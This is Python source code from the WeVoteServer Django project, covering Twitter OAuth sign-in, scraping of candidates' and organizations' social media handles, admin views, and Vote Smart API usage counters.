results = retrieve_twitter_user_info(organization.organization_twitter_handle)
retrieved_twitter_data = results['success']
number_of_twitter_accounts_queried += 1
if retrieved_twitter_data:
number_of_organizations_updated += 1
save_results = organization_manager.update_organization_twitter_details(
organization, results['twitter_json'])
if save_results['success']:
results = update_social_media_statistics_in_other_tables(organization)
status = "ALL_ORGANIZATION_TWITTER_DATA_RETRIEVED"
results = {
'success': True,
'status': status,
'number_of_twitter_accounts_queried': number_of_twitter_accounts_queried,
'number_of_organizations_updated': number_of_organizations_updated,
}
return results
def scrape_and_save_social_media_for_candidates_in_one_election(google_civic_election_id=0):
facebook_pages_found = 0
twitter_handles_found = 0
force_retrieve = False
status = ""
google_civic_election_id = convert_to_int(google_civic_election_id)
candidate_manager = CandidateCampaignManager()
candidate_list_manager = CandidateCampaignListManager()
return_list_of_objects = True
results = candidate_list_manager.retrieve_all_candidates_for_upcoming_election(google_civic_election_id,
return_list_of_objects)
status += results['status']
if results['success']:
candidate_list = results['candidate_list_objects']
else:
candidate_list = []
for candidate in candidate_list:
twitter_handle = False
facebook_page = False
if not candidate.candidate_url:
continue
if (not positive_value_exists(candidate.candidate_twitter_handle)) or force_retrieve:
scrape_results = scrape_social_media_from_one_site(candidate.candidate_url)
# Only include a change if we have a new value (do not try to save blank value)
if scrape_results['twitter_handle_found'] and positive_value_exists(scrape_results['twitter_handle']):
twitter_handle = scrape_results['twitter_handle']
twitter_handles_found += 1
if scrape_results['facebook_page_found'] and positive_value_exists(scrape_results['facebook_page']):
facebook_page = scrape_results['facebook_page']
facebook_pages_found += 1
save_results = candidate_manager.update_candidate_social_media(candidate, twitter_handle, facebook_page)
# ######################################
# We refresh the Twitter information in another function
status = "ORGANIZATION_SOCIAL_MEDIA_RETRIEVED"
results = {
'success': True,
'status': status,
'twitter_handles_found': twitter_handles_found,
'facebook_pages_found': facebook_pages_found,
}
return results
def refresh_twitter_candidate_details_for_election(google_civic_election_id):
twitter_handles_added = 0
profiles_refreshed_with_twitter_data = 0
google_civic_election_id = convert_to_int(google_civic_election_id)
candidate_list_manager = CandidateCampaignListManager()
return_list_of_objects = True
candidates_results = candidate_list_manager.retrieve_all_candidates_for_upcoming_election(
google_civic_election_id, return_list_of_objects)
if candidates_results['candidate_list_found']:
candidate_list = candidates_results['candidate_list_objects']
for candidate in candidate_list:
# Extract twitter_handle from google_civic_election information
if positive_value_exists(candidate.twitter_url) \
and not positive_value_exists(candidate.candidate_twitter_handle):
# If we got a twitter_url from Google Civic, and we haven't already stored a twitter handle, move it
candidate.candidate_twitter_handle = extract_twitter_handle_from_text_string(candidate.twitter_url)
candidate.save()
twitter_handles_added += 1
if positive_value_exists(candidate.candidate_twitter_handle):
refresh_twitter_candidate_details(candidate)
profiles_refreshed_with_twitter_data += 1
status = "CANDIDATE_SOCIAL_MEDIA_RETRIEVED"
results = {
'success': True,
'status': status,
'twitter_handles_added': twitter_handles_added,
'profiles_refreshed_with_twitter_data': profiles_refreshed_with_twitter_data,
}
return results
def transfer_candidate_twitter_handles_from_google_civic(google_civic_election_id=0):
twitter_handles_transferred = 0
status = ""
google_civic_election_id = convert_to_int(google_civic_election_id)
candidate_list_object = CandidateCampaignListManager()
return_list_of_objects = True
results = candidate_list_object.retrieve_all_candidates_for_upcoming_election(google_civic_election_id,
return_list_of_objects)
status += results['status']
if results['success']:
candidate_list = results['candidate_list_objects']
else:
candidate_list = []
for candidate in candidate_list:
if not candidate.twitter_url:
continue
# Only proceed if we don't already have a twitter_handle
if not positive_value_exists(candidate.candidate_twitter_handle):
            candidate.candidate_twitter_handle = extract_twitter_handle_from_text_string(candidate.twitter_url)
candidate.save()
twitter_handles_transferred += 1
# ######################################
# We refresh the Twitter information in another function
status += " CANDIDATE_TWITTER_HANDLES_TRANSFERRED"
results = {
'success': True,
'status': status,
'twitter_handles_transferred': twitter_handles_transferred,
}
return results
def twitter_sign_in_start_for_api(voter_device_id, return_url): # twitterSignInStart
"""
:param voter_device_id:
:param return_url: Where to direct the browser at the very end of the process
:return:
"""
# Get voter_id from the voter_device_id
results = is_voter_device_id_valid(voter_device_id)
if not results['success']:
results = {
'success': False,
'status': "VALID_VOTER_DEVICE_ID_MISSING",
'voter_device_id': voter_device_id,
'twitter_redirect_url': '',
'voter_info_retrieved': False,
'switch_accounts': False,
}
return results
voter_manager = VoterManager()
results = voter_manager.retrieve_voter_from_voter_device_id(voter_device_id)
if not positive_value_exists(results['voter_found']):
results = {
'status': "VALID_VOTER_MISSING",
'success': False,
'voter_device_id': voter_device_id,
'twitter_redirect_url': '',
'voter_info_retrieved': False,
'switch_accounts': False,
}
return results
voter = results['voter']
if voter.twitter_access_token and voter.twitter_access_secret:
# If here the voter might already be signed in, so we don't want to ask them to approve again
auth = tweepy.OAuthHandler(TWITTER_CONSUMER_KEY, TWITTER_CONSUMER_SECRET)
auth.set_access_token(voter.twitter_access_token, voter.twitter_access_secret)
api = tweepy.API(auth)
try:
tweepy_user_object = api.me()
success = True
            # TODO: Handle the case where the twitter_access_token and twitter_access_secret are no longer
            #  valid (wipe them from the database and rewind to the right place in the process).
except tweepy.RateLimitError:
success = False
status = 'TWITTER_RATE_LIMIT_ERROR'
except tweepy.error.TweepError as error_instance:
success = False
status = ''
error_tuple = error_instance.args
for error_dict in error_tuple:
for one_error in error_dict:
status += '[' + one_error['message'] + '] '
if success:
# Reach out to the twitterSignInRequestVoterInfo -- no need to redirect
empty_return_url = ""
voter_info_results = twitter_sign_in_request_voter_info_for_api(voter_device_id, empty_return_url)
success = voter_info_results['success']
status = "SKIPPED_AUTH_DIRECT_REQUEST_VOTER_INFO: " + voter_info_results['status']
results = {
'status': status,
'success': success,
'voter_device_id': voter_device_id,
'twitter_redirect_url': '',
'voter_info_retrieved': voter_info_results['voter_info_retrieved'],
'switch_accounts': voter_info_results['switch_accounts'], # If true, new voter_device_id returned
}
return results
else:
# Somehow reset tokens and start over.
pass
callback_url = WE_VOTE_SERVER_ROOT_URL + "/apis/v1/twitterSignInRequestAccessToken/"
callback_url += "?voter_device_id=" + voter_device_id
callback_url += "&return_url=" + return_url
    # This is where we ask Twitter for the authorization URL the voter's browser will be redirected to
twitter_authorization_url = ''
try:
# We take the Consumer Key and the Consumer Secret, and request a token & token_secret
auth = tweepy.OAuthHandler(TWITTER_CONSUMER_KEY, TWITTER_CONSUMER_SECRET, callback_url)
twitter_authorization_url = auth.get_authorization_url()
request_token_dict = auth.request_token
twitter_request_token = ''
twitter_request_token_secret = ''
if 'oauth_token' in request_token_dict:
twitter_request_token = request_token_dict['oauth_token']
if 'oauth_token_secret' in request_token_dict:
twitter_request_token_secret = request_token_dict['oauth_token_secret']
# We save these values in the Voter table, and then return a twitter_authorization_url where the voter signs in
# Once they sign in to the Twitter login, they are redirected back to the We Vote callback_url
# On that callback_url page, we are told if they are signed in
# on Twitter or not, and capture an access key we can use to retrieve information about the Twitter user
# NOTE: Regarding the callback url, I think this can just be a direct call to the API server,
# since we have the voter_device_id
if positive_value_exists(twitter_request_token) and positive_value_exists(twitter_request_token_secret):
voter.twitter_request_token = twitter_request_token
voter.twitter_request_secret = twitter_request_token_secret
voter.save()
success = True
status = "TWITTER_REDIRECT_URL_RETRIEVED"
else:
success = False
status = "TWITTER_REDIRECT_URL_NOT_RETRIEVED"
except tweepy.RateLimitError:
success = False
status = 'TWITTER_RATE_LIMIT_ERROR'
except tweepy.error.TweepError as error_instance:
success = False
status = 'TWITTER_SIGN_IN_START: '
error_tuple = error_instance.args
for error_dict in error_tuple:
for one_error in error_dict:
status += '[' + one_error['message'] + '] '
if success:
results = {
'status': status,
'success': True,
'voter_device_id': voter_device_id,
'twitter_redirect_url': twitter_authorization_url,
'voter_info_retrieved': False,
'switch_accounts': False,
}
else:
results = {
'status': status,
'success': False,
'voter_device_id': voter_device_id,
'twitter_redirect_url': '',
'voter_info_retrieved': False,
'switch_accounts': False,
}
return results
def twitter_sign_in_request_access_token_for_api(voter_device_id,
incoming_request_token, incoming_oauth_verifier,
return_url):
"""
twitterSignInRequestAccessToken
After signing in and agreeing to the application's terms, the user is redirected back to the application with
the same request token and another value, this time the OAuth verifier.
Within this function we use
1) the request token and
2) request secret along with the
3) OAuth verifier to get an access token, also from Twitter.
:param voter_device_id:
:param incoming_request_token:
:param incoming_oauth_verifier:
:param return_url: If a value is provided, return to this URL when the whole process is complete
:return:
"""
# Get voter_id from the voter_device_id
results = is_voter_device_id_valid(voter_device_id)
if not results['success']:
results = {
'success': False,
'status': "VALID_VOTER_DEVICE_ID_MISSING",
'voter_device_id': voter_device_id,
'access_token_and_secret_returned': False,
'return_url': return_url,
}
return results
voter_manager = VoterManager()
results = voter_manager.retrieve_voter_from_voter_device_id(voter_device_id)
if not positive_value_exists(results['voter_found']):
results = {
'status': "VALID_VOTER_MISSING",
'success': False,
'voter_device_id': voter_device_id,
'access_token_and_secret_returned': False,
'return_url': return_url,
}
return results
voter = results['voter']
if not voter.twitter_request_token == incoming_request_token:
results = {
'status': "TWITTER_REQUEST_TOKEN_DOES_NOT_MATCH_STORED_VOTER_VALUE",
'success': False,
'voter_device_id': voter_device_id,
'access_token_and_secret_returned': False,
'return_url': return_url,
}
return results
twitter_access_token = ''
twitter_access_token_secret = ''
try:
# We take the Request Token, Request Secret, and OAuth Verifier and request an access_token
auth = tweepy.OAuthHandler(TWITTER_CONSUMER_KEY, TWITTER_CONSUMER_SECRET)
auth.request_token = {'oauth_token': voter.twitter_request_token,
'oauth_token_secret': voter.twitter_request_secret}
auth.get_access_token(incoming_oauth_verifier)
if positive_value_exists(auth.access_token) and positive_value_exists(auth.access_token_secret):
twitter_access_token = auth.access_token
twitter_access_token_secret = auth.access_token_secret
except tweepy.RateLimitError:
success = False
status = 'TWITTER_RATE_LIMIT_ERROR'
    except tweepy.error.TweepError as error_instance:
        success = False
        status = 'TWITTER_SIGN_IN_REQUEST_ACCESS_TOKEN: '
        error_tuple = error_instance.args
        for error_dict in error_tuple:
            for one_error in error_dict:
                status += '[' + one_error['message'] + '] '
try:
# We save these values in the Voter table
if positive_value_exists(twitter_access_token) and positive_value_exists(twitter_access_token_secret):
voter.twitter_access_token = twitter_access_token
voter.twitter_access_secret = twitter_access_token_secret
voter.save()
success = True
status = "TWITTER_ACCESS_TOKEN_RETRIEVED_AND_SAVED"
else:
success = False
status = "TWITTER_ACCESS_TOKEN_NOT_RETRIEVED"
except Exception as e:
success = False
status = "TWITTER_ACCESS_TOKEN_NOT_SAVED"
if success:
results = {
'status': status,
'success': True,
'voter_device_id': voter_device_id,
'access_token_and_secret_returned': True,
'return_url': return_url,
}
else:
results = {
'status': status,
'success': False,
'voter_device_id': voter_device_id,
'access_token_and_secret_returned': False,
'return_url': return_url,
}
return results
def twitter_sign_in_request_voter_info_for_api(voter_device_id, return_url, switch_accounts_if_needed=True):
"""
twitterSignInRequestVoterInfo
When here, the incoming voter_device_id should already be authenticated
:param voter_device_id:
:param return_url: Where to return the browser when sign in process is complete
:param switch_accounts_if_needed:
:return:
"""
twitter_handle = ''
twitter_handle_found = False
tweepy_user_object = None
twitter_user_object_found = False
voter_info_retrieved = False
switch_accounts = False
# Get voter_id from the voter_device_id
results = is_voter_device_id_valid(voter_device_id)
if not results['success']:
results = {
'success': False,
'status': "VALID_VOTER_DEVICE_ID_MISSING",
'voter_device_id': voter_device_id,
'twitter_handle': twitter_handle,
'twitter_handle_found': twitter_handle_found,
'voter_info_retrieved': voter_info_retrieved,
'switch_accounts': switch_accounts,
'return_url': return_url,
}
return results
voter_manager = VoterManager()
results = voter_manager.retrieve_voter_from_voter_device_id(voter_device_id)
if not positive_value_exists(results['voter_found']):
results = {
'status': "VALID_VOTER_MISSING",
'success': False,
'voter_device_id': voter_device_id,
'twitter_handle': twitter_handle,
'twitter_handle_found': twitter_handle_found,
'voter_info_retrieved': voter_info_retrieved,
'switch_accounts': switch_accounts,
'return_url': return_url,
}
return results
voter = results['voter']
auth = tweepy.OAuthHandler(TWITTER_CONSUMER_KEY, TWITTER_CONSUMER_SECRET)
auth.set_access_token(voter.twitter_access_token, voter.twitter_access_secret)
api = tweepy.API(auth)
try:
tweepy_user_object = api.me()
twitter_json = tweepy_user_object._json
success = True
status = 'TWITTER_SIGN_IN_REQUEST_VOTER_INFO_SUCCESSFUL'
twitter_handle = tweepy_user_object.screen_name
twitter_handle_found = True
twitter_user_object_found = True
except tweepy.RateLimitError:
success = False
status = 'TWITTER_SIGN_IN_REQUEST_VOTER_INFO_RATE_LIMIT_ERROR'
except tweepy.error.TweepError as error_instance:
success = False
status = 'TWITTER_SIGN_IN_REQUEST_VOTER_INFO_TWEEPY_ERROR: '
error_tuple = error_instance.args
for error_dict in error_tuple:
for one_error in error_dict:
status += '[' + one_error['message'] + '] '
if twitter_user_object_found:
# We need to deal with these cases
# 1) Does account already exist?
results = voter_manager.retrieve_voter_by_twitter_id(tweepy_user_object.id)
if results['voter_found'] and switch_accounts_if_needed:
voter_found_with_twitter_id = results['voter']
switch_accounts = True
# Relink this voter_device_id to the original account
voter_device_manager = VoterDeviceLinkManager()
voter_device_link_results = voter_device_manager.retrieve_voter_device_link(voter_device_id)
voter_device_link = voter_device_link_results['voter_device_link']
update_voter_device_link_results = voter_device_manager.update_voter_device_link(
voter_device_link, voter_found_with_twitter_id)
if update_voter_device_link_results['voter_device_link_updated']:
# Transfer access token and secret
voter_found_with_twitter_id.twitter_access_token = voter.twitter_access_token
voter_found_with_twitter_id.twitter_access_secret = voter.twitter_access_secret
voter_found_with_twitter_id.save()
status += "TWITTER_SIGN_IN-ALREADY_LINKED_TO_OTHER_ACCOUNT-TRANSFERRED "
success = True
save_user_results = voter_manager.save_twitter_user_values(voter_found_with_twitter_id,
tweepy_user_object)
if save_user_results['success']:
voter_info_retrieved = True
status += save_user_results['status']
else:
status = "TWITTER_SIGN_IN-ALREADY_LINKED_TO_OTHER_ACCOUNT-COULD_NOT_TRANSFER "
success = False
# 2) If account doesn't exist for this person, save
else:
save_user_results = voter_manager.save_twitter_user_values(voter, tweepy_user_object)
if save_user_results['success']:
voter_info_retrieved = True
results = {
'status': status,
'success': success,
'voter_device_id': voter_device_id,
'twitter_handle': twitter_handle,
'twitter_handle_found': twitter_handle_found,
'voter_info_retrieved': voter_info_retrieved,
'switch_accounts': switch_accounts,
'return_url': return_url,
}
return results
```
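The three twitter_sign_in_* functions above implement a standard three-legged OAuth flow. A hedged sketch of how a caller might chain them; the voter_device_id and the oauth_token/oauth_verifier values are placeholders, since in production Twitter supplies the latter two when it redirects the browser back to the callback_url:
```python
# Sketch only, assuming the functions above are importable from this module.
from import_export_twitter.controllers import (
    twitter_sign_in_start_for_api,
    twitter_sign_in_request_access_token_for_api,
    twitter_sign_in_request_voter_info_for_api,
)

voter_device_id = 'abc123'  # placeholder; normally supplied by the client
return_url = 'https://wevote.us/ballot'  # placeholder

# Step 1: get a twitter_redirect_url and send the browser there
start_results = twitter_sign_in_start_for_api(voter_device_id, return_url)

# Step 2: Twitter redirects back with oauth_token and oauth_verifier (placeholders below),
# which we exchange for an access token stored on the voter
token_results = twitter_sign_in_request_access_token_for_api(
    voter_device_id, 'oauth_token_from_twitter', 'oauth_verifier_from_twitter', return_url)

# Step 3: use the stored access token to pull the voter's Twitter profile
info_results = twitter_sign_in_request_voter_info_for_api(voter_device_id, return_url)
```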
#### File: WeVoteServer/import_export_twitter/functions.py
```python
from config.base import get_environment_variable
import tweepy
import wevote_functions.admin
logger = wevote_functions.admin.get_logger(__name__)
WE_VOTE_SERVER_ROOT_URL = get_environment_variable("WE_VOTE_SERVER_ROOT_URL")
TWITTER_CONSUMER_KEY = get_environment_variable("TWITTER_CONSUMER_KEY")
TWITTER_CONSUMER_SECRET = get_environment_variable("TWITTER_CONSUMER_SECRET")
TWITTER_ACCESS_TOKEN = get_environment_variable("TWITTER_ACCESS_TOKEN")
TWITTER_ACCESS_TOKEN_SECRET = get_environment_variable("TWITTER_ACCESS_TOKEN_SECRET")
def retrieve_twitter_user_info(twitter_handle):
auth = tweepy.OAuthHandler(TWITTER_CONSUMER_KEY, TWITTER_CONSUMER_SECRET)
auth.set_access_token(TWITTER_ACCESS_TOKEN, TWITTER_ACCESS_TOKEN_SECRET)
api = tweepy.API(auth)
twitter_handle_found = False
    twitter_json = {}
try:
twitter_user = api.get_user(twitter_handle)
twitter_json = twitter_user._json
success = True
status = 'TWITTER_RETRIEVE_SUCCESSFUL'
twitter_handle_found = True
except tweepy.RateLimitError:
success = False
status = 'TWITTER_RATE_LIMIT_ERROR'
except tweepy.error.TweepError as error_instance:
success = False
status = ''
error_tuple = error_instance.args
for error_dict in error_tuple:
for one_error in error_dict:
status += '[' + one_error['message'] + '] '
results = {
'status': status,
'success': success,
'twitter_handle': twitter_handle,
'twitter_handle_found': twitter_handle_found,
'twitter_json': twitter_json,
}
return results
```
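A short usage sketch for retrieve_twitter_user_info; the handle is a placeholder, the fields read from twitter_json follow Twitter's user object, and the Twitter credentials are assumed to be configured in the environment:
```python
from import_export_twitter.functions import retrieve_twitter_user_info

results = retrieve_twitter_user_info('WeVote')  # placeholder handle
if results['success']:
    twitter_json = results['twitter_json']
    print(twitter_json.get('screen_name'), twitter_json.get('followers_count'))
else:
    print(results['status'])
```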
#### File: WeVoteServer/import_export_twitter/views_admin.py
```python
from .controllers import refresh_twitter_candidate_details, retrieve_twitter_data_for_all_organizations, \
refresh_twitter_organization_details, \
scrape_social_media_from_one_site, refresh_twitter_candidate_details_for_election, \
scrape_and_save_social_media_for_candidates_in_one_election, scrape_and_save_social_media_from_all_organizations, \
transfer_candidate_twitter_handles_from_google_civic
from .functions import retrieve_twitter_user_info
from admin_tools.views import redirect_to_sign_in_page
from candidate.models import CandidateCampaignManager
from django.contrib.auth.decorators import login_required
from django.contrib import messages
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect
from organization.controllers import update_social_media_statistics_in_other_tables
from organization.models import OrganizationManager
from voter.models import voter_has_authority
import wevote_functions.admin
from wevote_functions.functions import convert_to_int, positive_value_exists
logger = wevote_functions.admin.get_logger(__name__)
@login_required
def refresh_twitter_candidate_details_view(request, candidate_id):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
candidate_manager = CandidateCampaignManager()
results = candidate_manager.retrieve_candidate_campaign(candidate_id)
if not results['candidate_campaign_found']:
messages.add_message(request, messages.INFO, results['status'])
return HttpResponseRedirect(reverse('candidate:candidate_edit', args=(candidate_id,)))
candidate_campaign = results['candidate_campaign']
results = refresh_twitter_candidate_details(candidate_campaign)
return HttpResponseRedirect(reverse('candidate:candidate_edit', args=(candidate_id,)))
@login_required
def refresh_twitter_organization_details_view(request, organization_id):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
google_civic_election_id = request.GET.get('google_civic_election_id', 0)
organization_manager = OrganizationManager()
results = organization_manager.retrieve_organization(organization_id)
if not results['organization_found']:
messages.add_message(request, messages.INFO, results['status'])
return HttpResponseRedirect(reverse('organization:organization_edit', args=(organization_id,)) +
'?google_civic_election_id=' + str(google_civic_election_id))
organization = results['organization']
results = refresh_twitter_organization_details(organization)
return HttpResponseRedirect(reverse('organization:organization_position_list', args=(organization_id,)) +
'?google_civic_election_id=' + str(google_civic_election_id))
@login_required
def refresh_twitter_politician_details_view(request, politician_id): # TODO DALE Get this working for politicians
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
# candidate_manager = CandidateCampaignManager()
# results = candidate_manager.retrieve_candidate_campaign(candidate_id)
#
# if not results['candidate_campaign_found']:
# messages.add_message(request, messages.INFO, results['status'])
# return HttpResponseRedirect(reverse('candidate:candidate_edit', args=(candidate_id,)))
#
# candidate_campaign = results['candidate_campaign']
#
# results = refresh_twitter_candidate_details(candidate_campaign)
return HttpResponseRedirect(reverse('politician:politician_edit', args=(politician_id,)))
@login_required
def scrape_website_for_social_media_view(request, organization_id, force_retrieve=False):
authority_required = {'admin'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
facebook_page = False
twitter_handle = False
organization_manager = OrganizationManager()
results = organization_manager.retrieve_organization(organization_id)
if not results['organization_found']:
messages.add_message(request, messages.INFO, results['status'])
return HttpResponseRedirect(reverse('organization:organization_edit', args=(organization_id,)))
organization = results['organization']
if not organization.organization_website:
messages.add_message(request, messages.ERROR, "No organizational website found.")
return HttpResponseRedirect(reverse('organization:organization_position_list', args=(organization_id,)))
if (not positive_value_exists(organization.organization_twitter_handle)) or \
(not positive_value_exists(organization.organization_facebook)) or force_retrieve:
scrape_results = scrape_social_media_from_one_site(organization.organization_website)
if scrape_results['twitter_handle_found']:
twitter_handle = scrape_results['twitter_handle']
messages.add_message(request, messages.INFO, "Twitter handle found: " + twitter_handle)
else:
messages.add_message(request, messages.INFO, "No Twitter handle found: " + scrape_results['status'])
if scrape_results['facebook_page_found']:
facebook_page = scrape_results['facebook_page']
messages.add_message(request, messages.INFO, "Facebook page found: " + facebook_page)
save_results = organization_manager.update_organization_social_media(organization, twitter_handle,
facebook_page)
if save_results['success']:
organization = save_results['organization']
else:
organization.organization_twitter_handle = twitter_handle # Store it temporarily
# ######################################
if organization.organization_twitter_handle:
results = retrieve_twitter_user_info(organization.organization_twitter_handle)
if results['success']:
save_results = organization_manager.update_organization_twitter_details(
organization, results['twitter_json'])
if save_results['success']:
organization = save_results['organization']
results = update_social_media_statistics_in_other_tables(organization)
# ######################################
return HttpResponseRedirect(reverse('organization:organization_position_list', args=(organization_id,)))
@login_required
def retrieve_twitter_data_for_all_organizations_view(request):
authority_required = {'admin'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
organization_state_code = request.GET.get('organization_state', '')
google_civic_election_id = request.GET.get('google_civic_election_id', 0)
first_retrieve_only = request.GET.get('first_retrieve_only', True)
results = retrieve_twitter_data_for_all_organizations(state_code=organization_state_code,
google_civic_election_id=google_civic_election_id,
first_retrieve_only=first_retrieve_only)
if not results['success']:
messages.add_message(request, messages.INFO, results['status'])
else:
number_of_twitter_accounts_queried = results['number_of_twitter_accounts_queried']
number_of_organizations_updated = results['number_of_organizations_updated']
messages.add_message(request, messages.INFO,
"Twitter accounts queried: {number_of_twitter_accounts_queried}, "
"Organizations updated: {number_of_organizations_updated}".format(
number_of_twitter_accounts_queried=number_of_twitter_accounts_queried,
number_of_organizations_updated=number_of_organizations_updated))
return HttpResponseRedirect(reverse('organization:organization_list', args=()) +
'?organization_state=' + organization_state_code)
@login_required
def scrape_social_media_from_all_organizations_view(request):
authority_required = {'admin'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
organization_state_code = request.GET.get('organization_state', '')
force_retrieve = request.GET.get('force_retrieve', False) # Retrieve data again even if we already have data
results = scrape_and_save_social_media_from_all_organizations(state_code=organization_state_code,
force_retrieve=force_retrieve)
if not results['success']:
messages.add_message(request, messages.INFO, results['status'])
else:
twitter_handles_found = results['twitter_handles_found']
messages.add_message(request, messages.INFO,
"Social media retrieved. Twitter handles found: {twitter_handles_found}".format(
twitter_handles_found=twitter_handles_found))
return HttpResponseRedirect(reverse('organization:organization_list', args=()) +
'?organization_state=' + organization_state_code)
@login_required
def scrape_social_media_for_candidates_in_one_election_view(request):
authority_required = {'admin'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
google_civic_election_id = request.GET.get('google_civic_election_id', 0)
results = scrape_and_save_social_media_for_candidates_in_one_election(
google_civic_election_id=google_civic_election_id)
if not results['success']:
messages.add_message(request, messages.INFO, results['status'])
else:
twitter_handles_found = results['twitter_handles_found']
messages.add_message(request, messages.INFO,
"Social media retrieved. Twitter handles found: {twitter_handles_found}".format(
twitter_handles_found=twitter_handles_found))
return HttpResponseRedirect(reverse('candidate:candidate_list', args=()) +
'?google_civic_election_id=' + str(google_civic_election_id))
@login_required
def refresh_twitter_candidate_details_for_election_view(request, election_id):
authority_required = {'admin'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
google_civic_election_id = convert_to_int(election_id)
results = refresh_twitter_candidate_details_for_election(google_civic_election_id=google_civic_election_id)
if not results['success']:
messages.add_message(request, messages.INFO, results['status'])
else:
twitter_handles_added = results['twitter_handles_added']
profiles_refreshed_with_twitter_data = results['profiles_refreshed_with_twitter_data']
messages.add_message(request, messages.INFO,
"Social media retrieved. Twitter handles added: {twitter_handles_added}, "
"Profiles refreshed with Twitter data: {profiles_refreshed_with_twitter_data}".format(
twitter_handles_added=twitter_handles_added,
profiles_refreshed_with_twitter_data=profiles_refreshed_with_twitter_data))
return HttpResponseRedirect(reverse('candidate:candidate_list', args=()) +
'?google_civic_election_id=' + election_id)
@login_required
def transfer_candidate_twitter_handles_from_google_civic_view(request):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
google_civic_election_id = request.GET.get('google_civic_election_id', 0)
results = transfer_candidate_twitter_handles_from_google_civic(
google_civic_election_id=google_civic_election_id)
if not results['success']:
messages.add_message(request, messages.INFO, results['status'])
else:
twitter_handles_transferred = results['twitter_handles_transferred']
messages.add_message(request, messages.INFO,
"Twitter handles transferred: {twitter_handles_transferred}".format(
twitter_handles_transferred=twitter_handles_transferred))
return HttpResponseRedirect(reverse('candidate:candidate_list', args=()) +
'?google_civic_election_id=' + str(google_civic_election_id))
```
#### File: WeVoteServer/import_export_vote_smart/models.py
```python
from datetime import date, timedelta
from django.db import models
from django.db.models import Q
from organization.models import OrganizationManager, Organization
import wevote_functions.admin
from wevote_functions.functions import convert_to_int, positive_value_exists
logger = wevote_functions.admin.get_logger(__name__)
class VoteSmartApiCounter(models.Model):
    # The date and time we reached out to the Vote Smart API
datetime_of_action = models.DateTimeField(verbose_name='date and time of action', null=False, auto_now=True)
kind_of_action = models.CharField(verbose_name="kind of call to vote smart", max_length=50, null=True, blank=True)
# Store the election this is for
google_civic_election_id = models.PositiveIntegerField(verbose_name="google civic election id", null=True)
# This table contains summary entries generated from individual entries stored in the VoteSmartApiCounter table
class VoteSmartApiCounterDailySummary(models.Model):
# The date (without time) we are summarizing
date_of_action = models.DateField(verbose_name='date of action', null=False, auto_now=False)
# For each day we will have an "all" entry, as well as one entry with the total number (per day)
    # of each kind of call to Vote Smart
kind_of_action = models.CharField(verbose_name="kind of call to vote smart", max_length=50, null=True, blank=True)
# Store the election this is for
google_civic_election_id = models.PositiveIntegerField(verbose_name="google civic election id", null=True)
# This table contains summary entries generated from individual entries stored in the VoteSmartApiCounter table
class VoteSmartApiCounterWeeklySummary(models.Model):
# The year as a 4 digit integer
year_of_action = models.SmallIntegerField(verbose_name='year of action', null=False)
# The week in this year as a number between 1-52
    # For each week we will have an "all" entry, as well as one entry with the total number (per week)
    # of each kind of call to Vote Smart
week_of_action = models.SmallIntegerField(verbose_name='number of the week', null=False)
kind_of_action = models.CharField(verbose_name="kind of call to vote smart", max_length=50, null=True, blank=True)
# Store the election this is for
google_civic_election_id = models.PositiveIntegerField(verbose_name="google civic election id", null=True)
# This table contains summary entries generated from individual entries stored in the VoteSmartApiCounter table
class VoteSmartApiCounterMonthlySummary(models.Model):
# The year as a 4 digit integer
year_of_action = models.SmallIntegerField(verbose_name='year of action', null=False)
    # The month in this year as a number between 1-12
    # For each month we will have an "all" entry, as well as one entry with the total number (per month)
    # of each kind of call to Vote Smart
month_of_action = models.SmallIntegerField(verbose_name='number of the month', null=False)
kind_of_action = models.CharField(verbose_name="kind of call to vote smart", max_length=50, null=True, blank=True)
# Store the election this is for
google_civic_election_id = models.PositiveIntegerField(verbose_name="google civic election id", null=True)
# noinspection PyBroadException
class VoteSmartApiCounterManager(models.Model):
def create_counter_entry(self, kind_of_action, google_civic_election_id=0):
"""
        Create an entry that records that a call to the Vote Smart API was made.
"""
try:
google_civic_election_id = convert_to_int(google_civic_election_id)
# TODO: We need to work out the timezone questions
VoteSmartApiCounter.objects.create(
kind_of_action=kind_of_action,
google_civic_election_id=google_civic_election_id,
)
success = True
status = 'ENTRY_SAVED'
except Exception:
success = False
status = 'SOME_ERROR'
results = {
'success': success,
'status': status,
}
return results
def retrieve_daily_summaries(self, kind_of_action='', google_civic_election_id=0):
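        # Returns a list of dicts shaped like {'date_string': <date>, 'count': <int>},
        # one entry per recent day that had at least one counted API call (shape inferred from the code below)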
# Start with today and cycle backwards in time
daily_summaries = []
day_on_stage = date.today() # TODO: We need to work out the timezone questions
number_found = 0
maximum_attempts = 30
attempt_count = 0
try:
            # Limit the number of times this runs to EITHER 1) 5 days with positive counts
            # OR 2) 30 days in the past, whichever comes first
            while number_found < 5 and attempt_count < maximum_attempts:
attempt_count += 1
counter_queryset = VoteSmartApiCounter.objects.all()
if positive_value_exists(kind_of_action):
counter_queryset = counter_queryset.filter(kind_of_action=kind_of_action)
if positive_value_exists(google_civic_election_id):
counter_queryset = counter_queryset.filter(google_civic_election_id=google_civic_election_id)
# Find the number of these entries on that particular day
counter_queryset = counter_queryset.filter(datetime_of_action__contains=day_on_stage)
                api_call_count = counter_queryset.count()
# If any api calls were found on that date, pass it out for display
if positive_value_exists(api_call_count):
daily_summary = {
'date_string': day_on_stage,
'count': api_call_count,
}
daily_summaries.append(daily_summary)
number_found += 1
day_on_stage -= timedelta(days=1)
        except Exception as e:
            logger.error("RETRIEVE_DAILY_SUMMARIES_FAILED: {error}".format(error=e))
return daily_summaries
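# Usage sketch (illustrative; the kind_of_action value is hypothetical):
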